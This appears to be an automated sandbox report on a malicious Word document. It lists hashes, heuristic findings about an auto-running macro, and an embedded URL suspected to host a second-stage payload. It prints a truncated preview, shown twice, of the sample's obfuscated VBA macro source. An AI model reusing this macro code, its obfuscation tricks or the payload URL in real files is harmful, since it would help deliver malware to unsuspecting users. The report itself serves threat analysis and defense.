Office (OLE) malware analysis — malicious · 7d3116e7f9360433

MALICIOUS

Office (OLE)

268.5 KB Created: 2018-05-28 10:20:00 Authoring application: Microsoft Office Word First seen: 2018-06-14

MD5: dd4ff12cfc5e59e754e231a35e938904 SHA-1: e0933f24844c80c719606045f93401542f865e04 SHA-256: 7d3116e7f936043344f2f001444da0fa2bb436d51a0d15e798e8359c347e5706

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a legacy WordBasic AutoOpen macro that utilizes CreateObject, indicating an attempt to execute arbitrary code. The macro is obfuscated, but the presence of AutoOpen and CreateObject strongly suggests it's designed to download and execute a second-stage payload from the embedded URL http://cloakingtds.xyz/text.png.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://cloakingtds.xyz/text.png In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 89609 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	89609 bytes
SHA-256: `29a44fe509832ed6812890e5893dca46215f6846b637aa4585c3f606c508a77f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "S2LtTH" Public Function GoN2cHN8Hl8Wplu(ByRef fkZsTV0EmzV4kx As String, ByRef THREE As String) As String Dim CpbmowGaeRkkEHM() As Byte Dim j2KH3ANjcL3rUWb As String j2KH3ANjcL3rUWb = Application.UserName Dim yn92iHD8HJSwgmf3M, y6SrZGWczRzJKnOkDcL As Integer y6SrZGWczRzJKnOkDcL = Len(j2KH3ANjcL3rUWb) Dim PNA9KVMsYeyXErHD As Collection While y6SrZGWczRzJKnOkDcL > 5 yn92iHD8HJSwgmf3M = yn92iHD8HJSwgmf3M + 4 y6SrZGWczRzJKnOkDcL = y6SrZGWczRzJKnOkDcL - 1 Wend Dim lMWZ1ulOXFIXles As Collection Set lMWZ1ulOXFIXles = New Collection lMWZ1ulOXFIXles.Add "dlha7z18Wp4LpbGWeqKKBT4locG39wI0M8O5UpaeIsfz3" lMWZ1ulOXFIXles.Add "EPByTVOfKq5wfr88" lMWZ1ulOXFIXles.Add "D9rNKCxQqBSyHrmxCo87xf7cEPZ24wKt4Q0C50E98DpNMViNKppTAnriBOI5m6V31" lMWZ1ulOXFIXles.Add "01j3Lj98vxuQsqLsOG0tRjSBrsJWCrvWobrWkweuBo5sQ8ZPaOGwAxmRjiMdam6DDYlR8" lMWZ1ulOXFIXles.Add "cmGsnojusS35zl8VyxazCjBTYr1p1WIQlGnK3H8n9zdKgrIcEDwbhCF2lwT5w42WJnTr8ybr1wzPG0wriZ" lMWZ1ulOXFIXles.Add "jrtjBujHzC0F4GB3XbeQlFkuPxwuAmWXUEzc3upNPU4y6rU9x2TH4TNeG8UL8yGKqcv0" Dim onzEjO1rdKepExe As String onzEjO1rdKepExe = Application.UserName Dim Dmt33qyKqDNvQgLEF, JRGZn3h4jptFUt6sKln As Integer JRGZn3h4jptFUt6sKln = Len(onzEjO1rdKepExe) Dim BKRje7Ayj61bfckZ As Collection While JRGZn3h4jptFUt6sKln > 7 Dmt33qyKqDNvQgLEF = Dmt33qyKqDNvQgLEF + 6 JRGZn3h4jptFUt6sKln = JRGZn3h4jptFUt6sKln - 1 Wend Dim SJq9GE6xTGX5pV8 As Collection Set SJq9GE6xTGX5pV8 = New Collection SJq9GE6xTGX5pV8.Add "beS9UqENzLtEuW8WXEv6e7ad1JLOSXbf7OgQSVvImnYEwKKZmpW1oumdEyIKf05atNHfxsE" SJq9GE6xTGX5pV8.Add "nU0jVqr8vlnAk" SJq9GE6xTGX5pV8.Add "mDMdNkmws7UiDpk4kViAav4sIaLtOSaJV43vglzsAiIlBHnTLrCoC1v1IdUwY2hagLNIvyX9i091mSrAz2" SJq9GE6xTGX5pV8.Add "PvHeJCnCQATIBsFx4fiXTCGL14OxwU9gUAKuEs9sKVthh104N1GRTKN" SJq9GE6xTGX5pV8.Add "5mOyzQ6BwzAhUvMfxN8SjoAETm5" If Application.UserName = "KtFNLbkvncz" Then MsgBox ("AjHWZDXq5ha") Else Dim xuxU5sNgC91cka As Integer End If Dim hHYfBYMYkfNLIzE9nv() As Byte Dim EEm7nrziWhcF0Y As Integer Dim huUQBYQTdmR As String EEm7nrziWhcF0Y = 5882 Dim NOSvgXjccWm As Integer huUQBYQTdmR = Right(CStr(EEm7nrziWhcF0Y), Chr(Tan(CDbl(1.55039099610836)))) NOSvgXjccWm = CInt(huUQBYQTdmR) For ikSneTJEZx3 = NOSvgXjccWm To 41 EEm7nrziWhcF0Y = EEm7nrziWhcF0Y + 6 Next ikSneTJEZx3 If Chr(Tan(CDbl(1.55903216364514))) = U Then Dim UNbWniEFo0KUkB As String Dim i44J9fT4gMf As String i44J9fT4gMf = dtlquUXLmMz UNbWniEFo0KUkB = MB05tufCcDb End If If (StrComp(UNbWniEFo0KUkB, i44J9fT4gMf, vbTextCompare) <> 0) Then MsgBox ("zaxDO3a0eqO0Dx") End If Dim xeNy7FhojmsfKn, Fdm2gw1AAwW As Integer xeNy7FhojmsfKn = 1 Fdm2gw1AAwW = 4 #If EVhRDzcdY2J <> 0 Then EVhRDzcdY2J = EVhRDzcdY2J + 5 Dim DRQX1Qfo0sQ As Variant Else Dim DRQX1Qfo0sQ As Object #End If If xeNy7FhojmsfKn > Fdm2gw1AAwW Then For jQse2K5p6eab1u = Fdm2gw1AAwW To xeNy7FhojmsfKn Fdm2gw1AAwW = Fdm2gw1AAwW / xeNy7FhojmsfKn Next jQse2K5p6eab1u End If If Chr(Tan(CDbl(1.55903216364514))) = U Then Dim NC9EbIdwCEty64 As String Dim xeDxSveOeEr As String xeDxSveOeEr = agV9Vv6OapP NC9EbIdwCEty64 = codgJDViGEC End If If (StrComp(NC9EbIdwCEty64, xeDxSveOeEr, vbTextCompare) <> 0) Then MsgBox ("vnLaEBioAh5X6l") End If Dim aq6OAsO7MHl8ue, AZ9wn13uj8T As Integer aq6OAsO7MHl8ue = 4 AZ9wn13uj8T = 4 #If Hx1jLQqnH65 <> 0 Then Hx1jLQqnH65 = Hx1jLQqnH65 + 1 Dim oj47qtjhGog As Variant Else Dim oj47qtjhGog As Object #End If If aq6OAsO7MHl8ue > AZ9wn13uj8T Then For C3mR0mcluG7413 = AZ9wn13uj8T To aq6OAsO7MHl8ue AZ9wn13uj8T = AZ9wn13uj8T / aq6OAsO7MHl8ue Next C3mR0mcluG7413 End If Dim tpmw873ZDKgLyx As Integer For q9176SbjEEP = 3 To 32 tpmw873ZDKgLyx = q9176SbjEEP Next q9176SbjEEP If Chr(Tan(CDbl(1.55956084453693))) = Y Then Dim W1JGVQzu0l0zoV As String Dim kVtRJ8CbG2E As String kVtRJ8CbG2E = guuZz645ZPT ... (truncated)

SHA-256: 29a44fe509832ed6812890e5893dca46215f6846b637aa4585c3f606c508a77f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "S2LtTH"
Public Function GoN2cHN8Hl8Wplu(ByRef fkZsTV0EmzV4kx As String, ByRef THREE As String) As String
Dim CpbmowGaeRkkEHM() As Byte
Dim j2KH3ANjcL3rUWb As String
j2KH3ANjcL3rUWb = Application.UserName
Dim yn92iHD8HJSwgmf3M, y6SrZGWczRzJKnOkDcL As Integer
y6SrZGWczRzJKnOkDcL = Len(j2KH3ANjcL3rUWb)
Dim PNA9KVMsYeyXErHD As Collection
While y6SrZGWczRzJKnOkDcL > 5
yn92iHD8HJSwgmf3M = yn92iHD8HJSwgmf3M + 4
y6SrZGWczRzJKnOkDcL = y6SrZGWczRzJKnOkDcL - 1
Wend
Dim lMWZ1ulOXFIXles As Collection
Set lMWZ1ulOXFIXles = New Collection
lMWZ1ulOXFIXles.Add "dlha7z18Wp4LpbGWeqKKBT4locG39wI0M8O5UpaeIsfz3"
lMWZ1ulOXFIXles.Add "EPByTVOfKq5wfr88"
lMWZ1ulOXFIXles.Add "D9rNKCxQqBSyHrmxCo87xf7cEPZ24wKt4Q0C50E98DpNMViNKppTAnriBOI5m6V31"
lMWZ1ulOXFIXles.Add "01j3Lj98vxuQsqLsOG0tRjSBrsJWCrvWobrWkweuBo5sQ8ZPaOGwAxmRjiMdam6DDYlR8"
lMWZ1ulOXFIXles.Add "cmGsnojusS35zl8VyxazCjBTYr1p1WIQlGnK3H8n9zdKgrIcEDwbhCF2lwT5w42WJnTr8ybr1wzPG0wriZ"
lMWZ1ulOXFIXles.Add "jrtjBujHzC0F4GB3XbeQlFkuPxwuAmWXUEzc3upNPU4y6rU9x2TH4TNeG8UL8yGKqcv0"
Dim onzEjO1rdKepExe As String
onzEjO1rdKepExe = Application.UserName
Dim Dmt33qyKqDNvQgLEF, JRGZn3h4jptFUt6sKln As Integer
JRGZn3h4jptFUt6sKln = Len(onzEjO1rdKepExe)
Dim BKRje7Ayj61bfckZ As Collection
While JRGZn3h4jptFUt6sKln > 7
Dmt33qyKqDNvQgLEF = Dmt33qyKqDNvQgLEF + 6
JRGZn3h4jptFUt6sKln = JRGZn3h4jptFUt6sKln - 1
Wend
Dim SJq9GE6xTGX5pV8 As Collection
Set SJq9GE6xTGX5pV8 = New Collection
SJq9GE6xTGX5pV8.Add "beS9UqENzLtEuW8WXEv6e7ad1JLOSXbf7OgQSVvImnYEwKKZmpW1oumdEyIKf05atNHfxsE"
SJq9GE6xTGX5pV8.Add "nU0jVqr8vlnAk"
SJq9GE6xTGX5pV8.Add "mDMdNkmws7UiDpk4kViAav4sIaLtOSaJV43vglzsAiIlBHnTLrCoC1v1IdUwY2hagLNIvyX9i091mSrAz2"
SJq9GE6xTGX5pV8.Add "PvHeJCnCQATIBsFx4fiXTCGL14OxwU9gUAKuEs9sKVthh104N1GRTKN"
SJq9GE6xTGX5pV8.Add "5mOyzQ6BwzAhUvMfxN8SjoAETm5"
If Application.UserName = "KtFNLbkvncz" Then
MsgBox ("AjHWZDXq5ha")
Else
Dim xuxU5sNgC91cka As Integer
End If
Dim hHYfBYMYkfNLIzE9nv() As Byte
Dim EEm7nrziWhcF0Y As Integer
Dim huUQBYQTdmR As String
EEm7nrziWhcF0Y = 5882
Dim NOSvgXjccWm As Integer
huUQBYQTdmR = Right(CStr(EEm7nrziWhcF0Y), Chr(Tan(CDbl(1.55039099610836))))
NOSvgXjccWm = CInt(huUQBYQTdmR)
For ikSneTJEZx3 = NOSvgXjccWm To 41
EEm7nrziWhcF0Y = EEm7nrziWhcF0Y + 6
Next ikSneTJEZx3
If Chr(Tan(CDbl(1.55903216364514))) = U Then
Dim UNbWniEFo0KUkB As String
Dim i44J9fT4gMf As String
i44J9fT4gMf = dtlquUXLmMz
UNbWniEFo0KUkB = MB05tufCcDb
End If
If (StrComp(UNbWniEFo0KUkB, i44J9fT4gMf, vbTextCompare) <> 0) Then
MsgBox ("zaxDO3a0eqO0Dx")
End If
Dim xeNy7FhojmsfKn, Fdm2gw1AAwW As Integer
xeNy7FhojmsfKn = 1
Fdm2gw1AAwW = 4
#If EVhRDzcdY2J <> 0 Then
EVhRDzcdY2J = EVhRDzcdY2J + 5
Dim DRQX1Qfo0sQ As Variant
Else
Dim DRQX1Qfo0sQ As Object
#End If
If xeNy7FhojmsfKn > Fdm2gw1AAwW Then
For jQse2K5p6eab1u = Fdm2gw1AAwW To xeNy7FhojmsfKn
Fdm2gw1AAwW = Fdm2gw1AAwW / xeNy7FhojmsfKn
Next jQse2K5p6eab1u
End If
If Chr(Tan(CDbl(1.55903216364514))) = U Then
Dim NC9EbIdwCEty64 As String
Dim xeDxSveOeEr As String
xeDxSveOeEr = agV9Vv6OapP
NC9EbIdwCEty64 = codgJDViGEC
End If
If (StrComp(NC9EbIdwCEty64, xeDxSveOeEr, vbTextCompare) <> 0) Then
MsgBox ("vnLaEBioAh5X6l")
End If
Dim aq6OAsO7MHl8ue, AZ9wn13uj8T As Integer
aq6OAsO7MHl8ue = 4
AZ9wn13uj8T = 4
#If Hx1jLQqnH65 <> 0 Then
Hx1jLQqnH65 = Hx1jLQqnH65 + 1
Dim oj47qtjhGog As Variant
Else
Dim oj47qtjhGog As Object
#End If
If aq6OAsO7MHl8ue > AZ9wn13uj8T Then
For C3mR0mcluG7413 = AZ9wn13uj8T To aq6OAsO7MHl8ue
AZ9wn13uj8T = AZ9wn13uj8T / aq6OAsO7MHl8ue
Next C3mR0mcluG7413
End If
Dim tpmw873ZDKgLyx As Integer
For q9176SbjEEP = 3 To 32
tpmw873ZDKgLyx = q9176SbjEEP
Next q9176SbjEEP
If Chr(Tan(CDbl(1.55956084453693))) = Y Then
Dim W1JGVQzu0l0zoV As String
Dim kVtRJ8CbG2E As String
kVtRJ8CbG2E = guuZz645ZPT

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.